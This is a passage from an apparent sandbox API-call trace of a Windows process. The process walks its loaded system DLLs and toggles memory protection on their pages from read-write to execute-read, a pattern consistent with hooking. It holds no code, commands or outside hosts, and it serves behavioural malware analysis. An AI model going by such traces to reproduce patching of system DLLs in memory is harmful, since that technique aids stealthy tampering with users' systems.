hModule=0x77710000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0053.618] GetCurrentProcess () returned 0xffffffff [0053.618] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711520, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.618] GetCurrentProcess () returned 0xffffffff [0053.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711520, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.619] GetCurrentProcess () returned 0xffffffff [0053.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711540, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.619] GetCurrentProcess () returned 0xffffffff [0053.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711540, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.619] GetCurrentProcess () returned 0xffffffff [0053.619] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7771175c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.619] GetCurrentProcess () returned 0xffffffff [0053.620] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7771175c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.620] GetCurrentProcess () returned 0xffffffff [0053.620] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711768, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.620] GetCurrentProcess () returned 0xffffffff [0053.620] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711768, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.620] GetCurrentProcess () returned 0xffffffff [0053.620] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7771176c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.621] GetCurrentProcess () returned 0xffffffff [0053.621] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7771176c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.621] GetCurrentProcess () returned 0xffffffff [0053.621] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117b8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.621] GetCurrentProcess () returned 0xffffffff [0053.621] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117b8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.621] GetCurrentProcess () returned 0xffffffff [0053.621] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117bc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.621] GetCurrentProcess () returned 0xffffffff [0053.622] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117bc, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.622] GetCurrentProcess () returned 0xffffffff [0053.622] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.622] GetCurrentProcess () returned 0xffffffff [0053.622] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117c0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.622] GetCurrentProcess () returned 0xffffffff [0053.622] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117c8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.622] GetCurrentProcess () returned 0xffffffff [0053.623] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117c8, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.623] GetCurrentProcess () returned 0xffffffff [0053.623] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117d0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.623] GetCurrentProcess () returned 0xffffffff [0053.623] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117d0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.623] GetCurrentProcess () returned 0xffffffff [0053.623] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117f0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.623] GetCurrentProcess () returned 0xffffffff [0053.623] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x777117f0, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.624] GetCurrentProcess () returned 0xffffffff [0053.624] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7771180c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.624] GetCurrentProcess () returned 0xffffffff [0053.624] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7771180c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.624] GetCurrentProcess () returned 0xffffffff [0053.624] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7771182c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.624] GetCurrentProcess () returned 0xffffffff [0053.624] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7771182c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.625] GetCurrentProcess () returned 0xffffffff [0053.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711850, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.625] GetCurrentProcess () returned 0xffffffff [0053.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711850, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.625] GetCurrentProcess () returned 0xffffffff [0053.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711860, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.625] GetCurrentProcess () returned 0xffffffff [0053.625] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711860, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.626] GetCurrentProcess () returned 0xffffffff [0053.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711864, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.626] GetCurrentProcess () returned 0xffffffff [0053.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711864, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.626] GetCurrentProcess () returned 0xffffffff [0053.626] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711868, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.626] GetCurrentProcess () returned 0xffffffff [0053.627] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711868, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.627] GetCurrentProcess () returned 0xffffffff [0053.627] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7771186c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.627] GetCurrentProcess () returned 0xffffffff [0053.627] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7771186c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.627] GetCurrentProcess () returned 0xffffffff [0053.627] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711870, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.628] GetCurrentProcess () returned 0xffffffff [0053.628] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x77711870, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x77711000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.628] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.629] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.629] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.629] GetModuleFileNameA (in: hModule=0x76d10000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")) returned 0x1f [0053.629] GetCurrentProcess () returned 0xffffffff [0053.629] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76d1101c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76d11000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.630] GetCurrentProcess () returned 0xffffffff [0053.630] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76d1101c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76d11000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.630] GetCurrentProcess () returned 0xffffffff [0053.630] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76d11074, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76d11000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.630] GetCurrentProcess () returned 0xffffffff [0053.630] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76d11074, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76d11000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.630] GetCurrentProcess () returned 0xffffffff [0053.630] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76d11088, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76d11000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.631] GetCurrentProcess () returned 0xffffffff [0053.631] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76d11088, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76d11000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.631] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.632] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.632] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.632] GetModuleFileNameA (in: hModule=0x76af0000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\RPCRT4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")) returned 0x1e [0053.632] GetCurrentProcess () returned 0xffffffff [0053.632] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76b00208, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76b00000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.632] GetCurrentProcess () returned 0xffffffff [0053.632] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76b00208, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76b00000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.632] GetCurrentProcess () returned 0xffffffff [0053.632] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76b00218, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76b00000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.633] GetCurrentProcess () returned 0xffffffff [0053.633] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76b00218, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76b00000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.633] GetCurrentProcess () returned 0xffffffff [0053.633] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76b00328, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76b00000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.634] GetCurrentProcess () returned 0xffffffff [0053.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76b00328, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76b00000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.634] GetCurrentProcess () returned 0xffffffff [0053.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76b00330, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76b00000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.634] GetCurrentProcess () returned 0xffffffff [0053.634] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76b00330, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76b00000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.635] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.635] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.636] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.636] GetModuleFileNameA (in: hModule=0x757a0000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\SspiCli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")) returned 0x1f [0053.636] GetCurrentProcess () returned 0xffffffff [0053.636] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x757b0018, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x757b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.636] GetCurrentProcess () returned 0xffffffff [0053.636] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x757b0018, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x757b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.637] GetCurrentProcess () returned 0xffffffff [0053.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x757b0020, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x757b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.637] GetCurrentProcess () returned 0xffffffff [0053.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x757b0020, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x757b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.637] GetCurrentProcess () returned 0xffffffff [0053.637] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x757b00ac, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x757b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.638] GetCurrentProcess () returned 0xffffffff [0053.638] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x757b00ac, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x757b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.638] GetCurrentProcess () returned 0xffffffff [0053.638] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x757b00b4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x757b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.638] GetCurrentProcess () returned 0xffffffff [0053.638] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x757b00b4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x757b0000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.639] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.639] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.639] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.639] GetModuleFileNameA (in: hModule=0x75790000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\CRYPTBASE.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")) returned 0x21 [0053.639] GetCurrentProcess () returned 0xffffffff [0053.639] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75791060, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75791000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.640] GetCurrentProcess () returned 0xffffffff [0053.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x75791060, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75791000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.640] GetCurrentProcess () returned 0xffffffff [0053.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7579109c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75791000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.640] GetCurrentProcess () returned 0xffffffff [0053.640] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x7579109c, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75791000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.640] GetCurrentProcess () returned 0xffffffff [0053.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x757910a4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75791000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.641] GetCurrentProcess () returned 0xffffffff [0053.641] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x757910a4, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x75791000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.641] Module32Next (hSnapshot=0x110, lpme=0x41f58c) returned 1 [0053.642] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0053.642] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.642] GetModuleFileNameA (in: hModule=0x76e40000, lpFilename=0x41f434, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0053.642] GetCurrentProcess () returned 0xffffffff [0053.642] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41238, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x4, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x20) returned 0x0 [0053.643] GetCurrentProcess () returned 0xffffffff [0053.643] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41f538*=0x76e41238, NumberOfBytesToProtect=0x41f53c, NewAccessProtection=0x20, OldAccessProtection=0x41f570 | out: BaseAddress=0x41f538*=0x76e41000, NumberOfBytesToProtect=0x41f53c, OldAccessProtection=0x41f570*=0x4) returned 0x0 [0053.643] GetCurrentProcess () returned 0xffffffff [0053.643] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, 